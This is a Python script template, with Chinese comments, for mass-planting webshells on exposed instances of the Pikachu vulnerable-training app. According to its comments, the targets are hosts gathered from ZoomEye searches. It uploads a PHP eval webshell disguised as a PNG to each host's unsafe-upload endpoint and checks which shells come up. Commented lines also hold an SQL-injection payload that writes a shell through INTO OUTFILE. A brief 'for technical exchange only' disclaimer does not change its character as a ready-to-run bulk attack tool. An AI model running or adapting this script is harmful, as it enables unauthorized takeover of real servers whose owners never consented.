python批量get pikachu的shell脚本模板
声明:工具仅用于技术交流,请勿违法
'''EXP : getshell use pikachu'''
import requests
###############👇
path=r'D:\phpstudy_pro\WWW\UPLOAD\py\rouji\pikachu-data.txt' #地址列表文件位置 zoomeye前两页
###############👆
headers=[]
# re_getroot=re.compile(r'Password:(.*)</font>')
# class payloads:
# rootdir='vul/unsafeupload/uploads/satori.php'
# getroot=r'Less-2/?id=-1%20union%20select%201,2,@@datadir--+'
# writeshell= rf'Less-2/?id=-1%20union select 1,"<?php eval($_REQUSET[1])?>",3 into outfile {rootdir}--+'
shelldir='vul/unsafeupload/uploads/satori.php'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
"Cookie": "PHPSESSID=f7l8c2ev37d3n547bvh2nmgv29",
"Connection": "close",
}
data = {
"uploadfile": ("satori.php", "<?php\neval($_POST[\"pass\"]);\n", "image/png"),
"submit": (None, "开始上传"),
}
address_list=[]
#初始化输入的地址函数👇
def addstr(url):
def add_http_header(url):
if not url.startswith('http://'):
url = 'http://' + url
return url
def addxiegang(url):
if not url.endswith('/'):
url =url+'/'
return url
return addxiegang(add_http_header(url))
#读取地址列表👇
with open(path,'r',encoding='utf-8') as file:
for line in file:
address_list.append(addstr(line.replace("\n", "")))
#print(address_list)
#上传webshell函数
def upload_shell(address_list):
for address in address_list:
url=address+'vul/unsafeupload/servercheck.php'
try:
response = requests.post(url, headers=headers, files=data)
except:
pass
upload_shell(address_list)
#检验webshell函数
def check_shell(address_list):
for address in address_list:
url=address+shelldir
try:
response=requests.get(url)
status_code=response.status_code
if status_code==200:
print(url)
except:
pass
check_shell(address_list)
